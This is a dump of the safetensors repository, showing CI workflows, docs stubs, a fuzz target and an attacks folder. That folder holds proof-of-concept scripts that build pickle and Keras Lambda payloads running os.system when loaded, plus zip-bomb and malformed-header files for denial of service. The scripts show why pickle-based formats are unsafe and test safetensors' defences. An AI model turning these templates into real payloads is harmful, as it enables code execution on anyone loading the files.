├── codecov.yaml ├── codecov.yml ├── safetensors ├── LICENSE ├── README.md ├── fuzz │ ├── .gitignore │ ├── fuzz_targets │ │ └── fuzz_target_1.rs │ └── Cargo.toml ├── src │ └── lib.rs ├── Cargo.toml └── benches │ └── benchmark.rs ├── bindings └── python │ ├── tests │ ├── data │ │ └── __init__.py │ ├── test_handle.py │ ├── test_mlx_comparison.py │ ├── test_flax_comparison.py │ ├── test_tf_comparison.py │ ├── test_threadable.py │ ├── test_paddle_comparison.py │ └── test_pt_model.py │ ├── py_src │ └── safetensors │ │ ├── py.typed │ │ ├── __init__.py │ │ ├── flax.py │ │ ├── mlx.py │ │ ├── tensorflow.py │ │ ├── __init__.pyi │ │ ├── numpy.py │ │ └── paddle.py │ ├── MANIFEST.in │ ├── Cargo.toml │ ├── fuzz.py │ ├── .gitignore │ ├── README.md │ ├── setup.cfg │ ├── Makefile │ ├── convert_all.py │ ├── benches │ ├── test_paddle.py │ ├── test_flax.py │ ├── test_mlx.py │ ├── test_tf.py │ └── test_pt.py │ ├── pyproject.toml │ ├── src │ └── view.rs │ └── stub.py ├── .github ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── feature-request.yml │ └── bug-report.yml ├── conda │ ├── bld.bat │ ├── build.sh │ └── meta.yaml ├── workflows │ ├── delete_doc_comment_trigger.yml │ ├── delete_doc_comment.yml │ ├── trufflehog.yml │ ├── stale.yml │ ├── upload_pr_documentation.yml │ ├── build_documentation.yml │ ├── build_pr_documentation.yml │ ├── rust-release.yml │ ├── codecov.yml │ ├── rust.yml │ ├── python-bench.yml │ ├── python-release-conda.yml │ ├── python-release.yml │ └── python.yml ├── stale.yml └── PULL_REQUEST_TEMPLATE.md ├── .dockerignore ├── Makefile ├── attacks ├── tf_safe_ace_get_pwned.py ├── torch_ace_get_pwned.py ├── paddle_ace_get_pwned.py ├── numpy_dos_create.py ├── tf_safe_ace_create.py ├── numpy_dos_get_pwned.py ├── torch_dos_get_pwned.py ├── tf_ace_get_pwned.py ├── tf_ace_create.py ├── torch_ace_create.py ├── safetensors_abuse_attempt_1.py ├── torch_dos_create.py ├── safetensors_abuse_attempt_3.py ├── safetensors_abuse_attempt_2.py ├── paddle_ace_create.py └── README.md ├── .gitignore ├── docs ├── source │ ├── api │ │ ├── flax.mdx │ │ ├── numpy.mdx │ │ ├── paddle.mdx │ │ ├── tensorflow.mdx │ │ └── torch.mdx │ ├── _toctree.yml │ ├── convert-weights.md │ ├── speed.mdx │ ├── index.mdx │ ├── torch_shared_tensors.mdx │ └── metadata_parsing.mdx └── safetensors.schema.json ├── flake.lock ├── flake.nix ├── Dockerfile.s390x.test ├── .pre-commit-config.yaml ├── RELEASE.md └── README.md /codecov.yaml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /codecov.yml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /safetensors/LICENSE: -------------------------------------------------------------------------------- 1 | ../LICENSE -------------------------------------------------------------------------------- /safetensors/README.md: -------------------------------------------------------------------------------- 1 | ../README.md -------------------------------------------------------------------------------- /bindings/python/tests/data/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/py.typed: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /safetensors/fuzz/.gitignore: -------------------------------------------------------------------------------- 1 | target 2 | corpus 3 | artifacts 4 | coverage 5 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: true 2 | version: 2.1 3 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | bindings/python/target 3 | Dockerfile.s390x.test 4 | -------------------------------------------------------------------------------- /.github/conda/bld.bat: -------------------------------------------------------------------------------- 1 | cd bindings\python 2 | %PYTHON% -m pip install . --prefix=%PREFIX% 3 | -------------------------------------------------------------------------------- /.github/conda/build.sh: -------------------------------------------------------------------------------- 1 | cd bindings/python 2 | $PYTHON -m pip install . --prefix=$PREFIX 3 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | doc: 2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. 3 | -------------------------------------------------------------------------------- /attacks/tf_safe_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | new_model = tf.keras.models.load_model("tf_ace.keras") 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | safetensors/**/Cargo.lock 3 | bindings/python/Cargo.lock 4 | *.bin 5 | *.h5 6 | *.msgpack 7 | *.pt 8 | *.pdparams 9 | *.safetensors 10 | *.npz 11 | -------------------------------------------------------------------------------- /docs/source/api/flax.mdx: -------------------------------------------------------------------------------- 1 | # Flax API 2 | 3 | [[autodoc]] safetensors.flax.load_file 4 | [[autodoc]] safetensors.flax.load 5 | [[autodoc]] safetensors.flax.save_file 6 | [[autodoc]] safetensors.flax.save 7 | -------------------------------------------------------------------------------- /docs/source/api/numpy.mdx: -------------------------------------------------------------------------------- 1 | # Numpy API 2 | 3 | [[autodoc]] safetensors.numpy.load_file 4 | [[autodoc]] safetensors.numpy.load 5 | [[autodoc]] safetensors.numpy.save_file 6 | [[autodoc]] safetensors.numpy.save 7 | -------------------------------------------------------------------------------- /docs/source/api/paddle.mdx: -------------------------------------------------------------------------------- 1 | # PaddlePaddle API 2 | 3 | [[autodoc]] safetensors.paddle.load_file 4 | [[autodoc]] safetensors.paddle.load 5 | [[autodoc]] safetensors.paddle.save_file 6 | [[autodoc]] safetensors.paddle.save 7 | -------------------------------------------------------------------------------- /attacks/torch_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | weights = torch.load("torch_ace.pt") 4 | assert list(weights.keys()) == ["weight"] 5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /docs/source/api/tensorflow.mdx: -------------------------------------------------------------------------------- 1 | # Tensorflow API 2 | 3 | [[autodoc]] safetensors.tensorflow.load_file 4 | [[autodoc]] safetensors.tensorflow.load 5 | [[autodoc]] safetensors.tensorflow.save_file 6 | [[autodoc]] safetensors.tensorflow.save 7 | -------------------------------------------------------------------------------- /safetensors/fuzz/fuzz_targets/fuzz_target_1.rs: -------------------------------------------------------------------------------- 1 | #![no_main] 2 | 3 | use libfuzzer_sys::fuzz_target; 4 | use safetensors::tensor::SafeTensors; 5 | 6 | fuzz_target!(|data: &[u8]| { 7 | let _ = SafeTensors::deserialize(data); 8 | }); 9 | -------------------------------------------------------------------------------- /bindings/python/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include Cargo.toml 2 | include pyproject.toml 3 | include rust-toolchain 4 | include ../../LICENSE 5 | recursive-include src * 6 | recursive-include safetensors-lib * 7 | recursive-exclude safetensors-lib/target * 8 | -------------------------------------------------------------------------------- /attacks/paddle_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | 3 | weights = paddle.load("paddle_ace.pdparams")[0] 4 | assert list(weights.keys()) == ["weight"] 5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.py: -------------------------------------------------------------------------------- 1 | # Re-export this 2 | from ._safetensors_rust import ( # noqa: F401 3 | SafetensorError, 4 | __version__, 5 | deserialize, 6 | safe_open, 7 | _safe_open_handle, 8 | serialize, 9 | serialize_file, 10 | ) 11 | -------------------------------------------------------------------------------- /docs/source/api/torch.mdx: -------------------------------------------------------------------------------- 1 | # Torch API 2 | 3 | [[autodoc]] safetensors.torch.load_file 4 | [[autodoc]] safetensors.torch.load 5 | [[autodoc]] safetensors.torch.save_file 6 | [[autodoc]] safetensors.torch.save 7 | [[autodoc]] safetensors.torch.load_model 8 | [[autodoc]] safetensors.torch.save_model 9 | -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment_trigger.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment trigger 2 | 3 | on: 4 | pull_request: 5 | types: [ closed ] 6 | 7 | jobs: 8 | delete: 9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main 10 | with: 11 | pr_number: ${{ github.event.number }} -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Delete doc comment trigger"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | delete: 11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main 12 | secrets: 13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /attacks/numpy_dos_create.py: -------------------------------------------------------------------------------- 1 | from zipfile import ZIP_DEFLATED, ZipFile 2 | 3 | FILESIZE = 40 * 1000 # 40 Go 4 | BUFFER = b"\0" * 1000 * 1000 # 1Mo 5 | 6 | outfilename = "numpy_dos.npz" 7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 8 | with outzip.open("weights.npy", "w", force_zip64=True) as f: 9 | for i in range(FILESIZE): 10 | f.write(BUFFER) 11 | -------------------------------------------------------------------------------- /.github/workflows/trufflehog.yml: -------------------------------------------------------------------------------- 1 | on: 2 | push: 3 | 4 | name: Secret Leaks 5 | 6 | jobs: 7 | trufflehog: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - name: Checkout code 11 | uses: actions/checkout@v6 12 | with: 13 | fetch-depth: 0 14 | - name: Secret Scanning 15 | uses: trufflesecurity/trufflehog@main 16 | with: 17 | extra_args: --results=verified,unknown 18 | 19 | 20 | -------------------------------------------------------------------------------- /.github/workflows/stale.yml: -------------------------------------------------------------------------------- 1 | name: 'Close stale issues and PRs' 2 | on: 3 | schedule: 4 | - cron: '30 1 * * *' 5 | 6 | jobs: 7 | stale: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/stale@v10 11 | with: 12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' 13 | days-before-stale: 30 14 | days-before-close: 5 15 | -------------------------------------------------------------------------------- /.github/workflows/upload_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Upload PR Documentation 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Build PR Documentation"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | build: 11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main 12 | with: 13 | package_name: safetensors 14 | secrets: 15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /attacks/tf_safe_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | model.save("tf_ace.keras", save_format="keras_v3") 18 | -------------------------------------------------------------------------------- /attacks/numpy_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import numpy as np 4 | 5 | filename = "numpy_dos.npz" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | archive = np.load(filename) 13 | weights = archive["weight"] 14 | assert np.allclose(weights, np.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /bindings/python/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-python" 3 | version = "0.7.0-dev.0" 4 | edition = "2021" 5 | rust-version = "1.74" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | [lib] 9 | name = "safetensors_rust" 10 | crate-type = ["cdylib"] 11 | 12 | [dependencies] 13 | pyo3 = { version = "0.25", features = ["abi3", "abi3-py38"] } 14 | memmap2 = "0.9" 15 | serde_json = "1.0" 16 | 17 | [dependencies.safetensors] 18 | path = "../../safetensors" 19 | -------------------------------------------------------------------------------- /attacks/torch_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import torch 4 | 5 | filename = "torch_dos.pt" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | weights = torch.load(filename) 13 | assert list(weights.keys()) == ["weight"] 14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /safetensors/fuzz/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-fuzz" 3 | version = "0.0.0" 4 | publish = false 5 | edition = "2021" 6 | 7 | [package.metadata] 8 | cargo-fuzz = true 9 | 10 | [dependencies] 11 | libfuzzer-sys = "0.4" 12 | 13 | [dependencies.safetensors] 14 | path = ".." 15 | 16 | # Prevent this from interfering with workspaces 17 | [workspace] 18 | members = ["."] 19 | 20 | [profile.release] 21 | debug = 1 22 | 23 | [[bin]] 24 | name = "fuzz_target_1" 25 | path = "fuzz_targets/fuzz_target_1.rs" 26 | test = false 27 | doc = false 28 | -------------------------------------------------------------------------------- /attacks/tf_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import json 3 | 4 | import h5py 5 | import tensorflow as tf 6 | 7 | new_model = tf.keras.models.load_model("tf.h5") 8 | 9 | print("Transformers is not vulnerable to this, as it uses h5 directly.") 10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file") 11 | print("Let's show you the marshalled code") 12 | 13 | with h5py.File("tf_ace.h5") as f: 14 | data = json.loads(f.attrs["model_config"]) 15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0])) 16 | pass 17 | -------------------------------------------------------------------------------- /attacks/tf_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | ### 18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) 19 | 20 | model.save("tf_ace.h5") 21 | ### 22 | -------------------------------------------------------------------------------- /.github/conda/meta.yaml: -------------------------------------------------------------------------------- 1 | {% set name = "safetensors" %} 2 | 3 | package: 4 | name: "{{ name|lower }}" 5 | version: "{{ SAFETENSORS_VERSION }}" 6 | 7 | source: 8 | path: ../../ 9 | 10 | requirements: 11 | host: 12 | - pip 13 | - python x.x 14 | - setuptools 15 | - setuptools-rust 16 | - maturin 17 | 18 | run: 19 | - python x.x 20 | 21 | test: 22 | imports: 23 | - safetensors 24 | 25 | about: 26 | home: https://huggingface.co/docs/safetensors 27 | license: Apache License 2.0 28 | license_file: LICENSE 29 | summary: "Safe and portable way of storing tensors" 30 | -------------------------------------------------------------------------------- /attacks/torch_ace_create.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | 4 | class BadDict(dict): 5 | def __init__(self, src: str, **kwargs): 6 | super().__init__(**kwargs) 7 | self.src = src 8 | 9 | def __reduce__(self): 10 | return ( 11 | eval, 12 | (f"os.system('{self.src}') or dict()",), 13 | None, 14 | None, 15 | iter(self.items()), 16 | ) 17 | 18 | 19 | torch.save( 20 | BadDict( 21 | 'echo "pwned your computer, I can do anything I want."', 22 | **{"weight": torch.zeros((2, 2))}, 23 | ), 24 | "torch_ace.pt", 25 | ) 26 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_1.py: -------------------------------------------------------------------------------- 1 | import torch 2 | from safetensors.torch import load_file, save_file 3 | 4 | filename = "safetensors_abuse_attempt_1.safetensors" 5 | 6 | 7 | def create_payload(): 8 | weights = {"weight": torch.zeros((2, 2))} 9 | save_file(weights, filename) 10 | 11 | with open(filename, "r+b") as f: 12 | f.seek(0) 13 | # Now the header claims 2**32 - xx even though the file is small 14 | n = 1000 15 | n_bytes = n.to_bytes(8, "little") 16 | f.write(n_bytes) 17 | 18 | 19 | create_payload() 20 | # This properly crashes with an out of bounds exception. 21 | test = load_file(filename) 22 | -------------------------------------------------------------------------------- /flake.lock: -------------------------------------------------------------------------------- 1 | { 2 | "nodes": { 3 | "nixpkgs": { 4 | "locked": { 5 | "lastModified": 1730531603, 6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=", 7 | "owner": "NixOS", 8 | "repo": "nixpkgs", 9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d", 10 | "type": "github" 11 | }, 12 | "original": { 13 | "owner": "NixOS", 14 | "ref": "nixos-unstable", 15 | "repo": "nixpkgs", 16 | "type": "github" 17 | } 18 | }, 19 | "root": { 20 | "inputs": { 21 | "nixpkgs": "nixpkgs" 22 | } 23 | } 24 | }, 25 | "root": "root", 26 | "version": 7 27 | } 28 | -------------------------------------------------------------------------------- /docs/source/_toctree.yml: -------------------------------------------------------------------------------- 1 | - sections: 2 | - local: index 3 | title: 🤗 Safetensors 4 | - local: speed 5 | title: Speed Comparison 6 | - local: torch_shared_tensors 7 | title: Tensor Sharing in Pytorch 8 | - local: metadata_parsing 9 | title: Metadata Parsing 10 | - local: convert-weights 11 | title: Convert weights to safetensors 12 | title: Getting started 13 | - sections: 14 | - local: api/torch 15 | title: Torch API 16 | - local: api/tensorflow 17 | title: Tensorflow API 18 | - local: api/paddle 19 | title: PaddlePaddle API 20 | - local: api/flax 21 | title: Flax API 22 | - local: api/numpy 23 | title: Numpy API 24 | title: API 25 | -------------------------------------------------------------------------------- /.github/workflows/build_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build documentation 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | - doc-builder* 8 | - v*-release 9 | - use_templates 10 | 11 | jobs: 12 | build: 13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main 14 | with: 15 | commit_sha: ${{ github.sha }} 16 | package: safetensors 17 | notebook_folder: safetensors_doc 18 | package_path: safetensors/bindings/python/ 19 | version_tag_suffix: bindings/python/py_src/ 20 | install_rust: true 21 | secrets: 22 | token: ${{ secrets.HUGGINGFACE_PUSH }} 23 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 24 | -------------------------------------------------------------------------------- /.github/stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 | # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /.github/workflows/build_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build PR Documentation 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - "docs/**" 7 | - "bindings/python/py_src/**" 8 | - ".github/workflows/build_pr_documentation.yml" 9 | 10 | concurrency: 11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} 12 | cancel-in-progress: true 13 | 14 | jobs: 15 | build: 16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main 17 | with: 18 | commit_sha: ${{ github.event.pull_request.head.sha }} 19 | pr_number: ${{ github.event.number }} 20 | package: safetensors 21 | package_path: safetensors/bindings/python/ 22 | version_tag_suffix: bindings/python/py_src/ 23 | install_rust: true 24 | -------------------------------------------------------------------------------- /.github/workflows/rust-release.yml: -------------------------------------------------------------------------------- 1 | name: Rust Release 2 | 3 | env: 4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} 5 | 6 | on: 7 | push: 8 | tags: 9 | - v* 10 | 11 | jobs: 12 | rust_publish: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout repository 16 | uses: actions/checkout@v6 17 | 18 | - uses: dtolnay/rust-toolchain@stable 19 | - name: Cache Cargo Registry 20 | uses: actions/cache@v5 21 | with: 22 | path: ~/.cargo/registry 23 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} 24 | 25 | - name: Publish package rust 26 | if: ${{ !contains(github.ref, 'rc') }} 27 | working-directory: ./safetensors 28 | run: cargo publish --token ${CRATES_TOKEN} 29 | 30 | -------------------------------------------------------------------------------- /attacks/torch_dos_create.py: -------------------------------------------------------------------------------- 1 | import os 2 | from zipfile import ZIP_DEFLATED, ZipFile 3 | 4 | import torch 5 | 6 | FILESIZE = 40 * 1000 # 40 Go 7 | BUFFER = b"\0" * 1000 * 1000 # 1 Mo 8 | 9 | filename = "torch_dos_tmp.pt" 10 | torch.save({"weight": torch.zeros((2, 2))}, filename) 11 | 12 | 13 | with ZipFile(filename, "r") as torch_zip: 14 | outfilename = "torch_dos.pt" 15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read()) 17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read()) 18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f: 19 | for i in range(FILESIZE): 20 | f.write(BUFFER) 21 | 22 | os.remove(filename) 23 | -------------------------------------------------------------------------------- /bindings/python/fuzz.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import sys 3 | import tempfile 4 | from collections import defaultdict 5 | 6 | import atheris 7 | 8 | 9 | with atheris.instrument_imports(): 10 | from safetensors.torch import load_file 11 | 12 | 13 | EXCEPTIONS = defaultdict(int) 14 | START = datetime.datetime.now() 15 | DT = datetime.timedelta(seconds=30) 16 | 17 | 18 | def TestOneInput(data): 19 | global START 20 | with tempfile.NamedTemporaryFile() as f: 21 | f.write(data) 22 | f.seek(0) 23 | try: 24 | load_file(f.name, device=0) 25 | except Exception as e: 26 | EXCEPTIONS[str(e)] += 1 27 | 28 | if datetime.datetime.now() - START > DT: 29 | for e, n in EXCEPTIONS.items(): 30 | print(e, n) 31 | START = datetime.datetime.now() 32 | 33 | 34 | atheris.Setup(sys.argv, TestOneInput) 35 | atheris.Fuzz() 36 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_3.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [200, 200] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)} 15 | 16 | binary = json.dumps(metadata).encode("utf-8") 17 | n = len(binary) 18 | n_header = n.to_bytes(8, "little") 19 | 20 | with open(filename, "wb") as f: 21 | f.write(n_header) 22 | f.write(binary) 23 | f.write(b"\0" * n) 24 | 25 | 26 | create_payload() 27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 28 | start = datetime.datetime.now() 29 | test = load_file(filename) 30 | print(f"Loading the file took {datetime.datetime.now() - start}") 31 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_2.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [2, 2] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = { 15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10) 16 | } 17 | 18 | binary = json.dumps(metadata).encode("utf-8") 19 | n = len(binary) 20 | n_header = n.to_bytes(8, "little") 21 | 22 | with open(filename, "wb") as f: 23 | f.write(n_header) 24 | f.write(binary) 25 | f.write(b"\0" * n) 26 | 27 | 28 | create_payload() 29 | 30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 31 | start = datetime.datetime.now() 32 | test = load_file(filename) 33 | print(f"Loading the file took {datetime.datetime.now() - start}") 34 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # What does this PR do? 2 | 3 | 12 | 13 | 14 | 15 | Fixes # (issue) or description of the problem this PR solves. 16 | -------------------------------------------------------------------------------- /.github/workflows/codecov.yml: -------------------------------------------------------------------------------- 1 | name: Code coverage 2 | on: 3 | push: 4 | branches: 5 | - main 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | defaults: 11 | run: 12 | working-directory: ./safetensors 13 | 14 | steps: 15 | - uses: actions/checkout@v6 16 | 17 | - name: Install Rust Stable 18 | uses: dtolnay/rust-toolchain@stable 19 | with: 20 | components: llvm-tools-preview 21 | override: true 22 | 23 | - uses: Swatinem/rust-cache@v2 24 | 25 | - name: Install cargo-llvm-cov for Ubuntu 26 | run: cargo install cargo-llvm-cov 27 | 28 | - name: Coverage report 29 | run: cargo llvm-cov --release --lcov --output-path lcov.info 30 | 31 | - name: Upload to codecov.io 32 | uses: codecov/codecov-action@v5 33 | with: 34 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 35 | working-directory: ./safetensors 36 | fail_ci_if_error: true 37 | -------------------------------------------------------------------------------- /bindings/python/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | .pytest_cache/ 4 | *.py[cod] 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | .venv/ 12 | env/ 13 | bin/ 14 | build/ 15 | develop-eggs/ 16 | dist/ 17 | eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | include/ 24 | man/ 25 | venv/ 26 | *.egg-info/ 27 | .installed.cfg 28 | *.egg 29 | 30 | # Installer logs 31 | pip-log.txt 32 | pip-delete-this-directory.txt 33 | pip-selfcheck.json 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | 46 | # Mr Developer 47 | .mr.developer.cfg 48 | .project 49 | .pydevproject 50 | 51 | # Rope 52 | .ropeproject 53 | 54 | # Django stuff: 55 | *.log 56 | *.pot 57 | 58 | .DS_Store 59 | 60 | # Sphinx documentation 61 | docs/_build/ 62 | 63 | # PyCharm 64 | .idea/ 65 | 66 | # VSCode 67 | .vscode/ 68 | 69 | # Pyenv 70 | .python-version 71 | -------------------------------------------------------------------------------- /flake.nix: -------------------------------------------------------------------------------- 1 | { 2 | inputs = { 3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; 4 | }; 5 | 6 | outputs = 7 | { nixpkgs, ... }: 8 | let 9 | forAllSystems = nixpkgs.lib.genAttrs [ 10 | "aarch64-linux" 11 | "x86_64-linux" 12 | "aarch64-darwin" 13 | ]; 14 | in 15 | { 16 | devShells = forAllSystems ( 17 | system: 18 | let 19 | pkgs = nixpkgs.legacyPackages.${system}; 20 | in 21 | { 22 | default = pkgs.mkShell { 23 | buildInputs = with pkgs; [ 24 | rustup 25 | python3Packages.python 26 | python3Packages.venvShellHook 27 | ]; 28 | venvDir = "./.venv"; 29 | postVenvCreation = '' 30 | unset SOURCE_DATE_EPOCH 31 | ''; 32 | postShellHook = '' 33 | unset SOURCE_DATE_EPOCH 34 | ''; 35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib"; 36 | }; 37 | 38 | } 39 | ); 40 | }; 41 | } 42 | -------------------------------------------------------------------------------- /bindings/python/README.md: -------------------------------------------------------------------------------- 1 | ## Installation 2 | 3 | ``` 4 | pip install safetensors 5 | ``` 6 | 7 | 8 | ## Usage 9 | 10 | ### Numpy 11 | 12 | ```python 13 | from safetensors.numpy import save_file, load_file 14 | import numpy as np 15 | 16 | tensors = { 17 | "a": np.zeros((2, 2)), 18 | "b": np.zeros((2, 3), dtype=np.uint8) 19 | } 20 | 21 | save_file(tensors, "./model.safetensors") 22 | 23 | 24 | # Now loading 25 | loaded = load_file("./model.safetensors") 26 | ``` 27 | 28 | ### Torch 29 | 30 | ```python 31 | from safetensors.torch import save_file, load_file 32 | import torch 33 | 34 | tensors = { 35 | "a": torch.zeros((2, 2)), 36 | "b": torch.zeros((2, 3), dtype=torch.uint8) 37 | } 38 | 39 | save_file(tensors, "./model.safetensors") 40 | 41 | 42 | # Now loading 43 | loaded = load_file("./model.safetensors") 44 | ``` 45 | 46 | ### Developing 47 | 48 | ``` 49 | # inside ./safetensors/bindings/python 50 | pip install .[dev] 51 | ``` 52 | 